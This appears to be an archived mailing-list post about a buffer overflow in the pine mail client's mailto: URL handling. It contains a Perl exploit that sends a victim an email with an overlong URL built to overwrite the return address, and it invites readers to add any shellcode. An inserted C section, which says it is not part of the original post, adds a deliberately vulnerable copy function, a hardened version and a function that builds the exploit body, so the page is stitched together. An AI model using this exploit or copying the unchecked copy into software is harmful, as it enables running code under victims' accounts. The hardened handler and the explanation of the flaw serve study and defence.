~ : Versions of pine prior to 4.21 had a security problem when viewing
~ : URLs. By sending an email with a specially formatted URL embedded
~ : in it, an attacker could cause arbitrary shell code to be executed
~ : under the account of the victim user.

I don't know how dumb a user would have to be to actually become a victim of such exploitation. Not saying that the bug shouldn't be fixed anyway. If anyone's interested:

#!/usr/bin/perl
use strict;
use warnings;

# 1078 bytes of filler to reach the saved return address, followed by
# the return address itself ("@1111" is a placeholder; substitute a real one).
my $sploit = "A" x 1078;
$sploit .= "\@1111";
# rh 6.0/pine4.10 would love return address 0x82d4528
# or higher..

# Hand the message to sendmail; -t takes the recipients from the headers.
open(FOO, "| /usr/sbin/sendmail -t") or die "cannot run sendmail: $!";
print FOO "From: bogus\@yahoo.com\nTo: victim\@somehost\n\n";
print FOO "Mail me: mailto:$sploit";
close(FOO);

Pull in any shellcode you like (but mind that it should contain only printable characters; 0x20-0xff worked for me).

-Fyodor
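The pattern behind the advisory, as an added example that is not pine's code and not part of the original post: a hypothetical mailto: URL handler that copies a whitespace-delimited token from the message text into a fixed stack buffer without a length check, next to a bounds-checked version, plus a builder that produces a body shaped like the one the Perl script sends (1078 filler bytes and then the return-address bytes) and a check for the printable-byte constraint the post mentions. The buffer size URL_MAX, the function names and the printable-ASCII policy in the hardened handler are assumptions for illustration; the post gives only the 1078-byte distance to the return address.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Hypothetical fixed size of the URL buffer. The real size in pine 4.10
 * is not given in the post, only that 1078 filler bytes reach the
 * saved return address. */
#define URL_MAX 1024

/* Vulnerable pattern: locate "mailto:" in the message text and copy the
 * whitespace-delimited token into a fixed stack buffer with no length
 * check. A token longer than URL_MAX-1 bytes overwrites the stack.
 * Shown for contrast only; never call it with untrusted input. */
int handle_mailto_unsafe(const char *body)
{
    char url[URL_MAX];
    const char *p = strstr(body, "mailto:");
    if (p == NULL)
        return 0;
    size_t n = strcspn(p, " \t\r\n");  /* token ends at whitespace */
    memcpy(url, p, n);                  /* BUG: n is never compared to sizeof url */
    url[n] = '\0';
    return (int)strlen(url);
}

/* Hardened version: the caller supplies the buffer and its size, tokens
 * that do not fit are rejected, and so is any byte outside printable
 * ASCII (hypothetical policy; a URL never needs control or high bytes).
 * Returns the token length, 0 if there is no mailto: URL, -1 if rejected. */
int handle_mailto_safe(const char *body, char *out, size_t outsz)
{
    const char *p = strstr(body, "mailto:");
    if (p == NULL)
        return 0;
    size_t n = strcspn(p, " \t\r\n");
    if (n >= outsz)
        return -1;                      /* no room for token plus terminator */
    for (size_t i = 0; i < n; i++) {
        unsigned char c = (unsigned char)p[i];
        if (c < 0x20 || c > 0x7e)
            return -1;
    }
    memcpy(out, p, n);
    out[n] = '\0';
    return (int)n;
}

/* Builds the message body the Perl script sends: "Mail me: mailto:"
 * followed by `filler` bytes of 'A' and then the return-address bytes
 * (the script uses the placeholder "@1111"). Caller frees the result. */
char *build_exploit_body(size_t filler, const char *ret)
{
    const char *prefix = "Mail me: mailto:";
    size_t plen = strlen(prefix), rlen = strlen(ret);
    char *body = malloc(plen + filler + rlen + 1);
    if (body == NULL)
        return NULL;
    memcpy(body, prefix, plen);
    memset(body + plen, 'A', filler);
    memcpy(body + plen + filler, ret, rlen);
    body[plen + filler + rlen] = '\0';
    return body;
}

/* The post's constraint on the payload: every byte should lie in
 * 0x20..0xff. Returns 1 if all `n` bytes are in range, 0 otherwise
 * (the upper bound is implied by unsigned char). */
int payload_in_range(const unsigned char *buf, size_t n)
{
    for (size_t i = 0; i < n; i++)
        if (buf[i] < 0x20)
            return 0;
    return 1;
}

int main(void)
{
    char out[URL_MAX];
    char *body = build_exploit_body(1078, "@1111");
    if (body == NULL)
        return 1;
    printf("benign token length: %d\n",
           handle_mailto_safe("see mailto:bob@example.com thanks", out, sizeof out));
    printf("exploit body result: %d (-1 means rejected)\n",
           handle_mailto_safe(body, out, sizeof out));
    printf("payload bytes in 0x20..0xff: %d\n",
           payload_in_range((const unsigned char *)body, strlen(body)));
    free(body);
    return 0;
}
```

The hardened handler fails closed on length rather than truncating, because a silently truncated URL can still be handed to another component; whether to reject or truncate is a design choice, but the length comparison against the destination buffer is the part the vulnerable pattern omits.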
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 15:13:51 PDT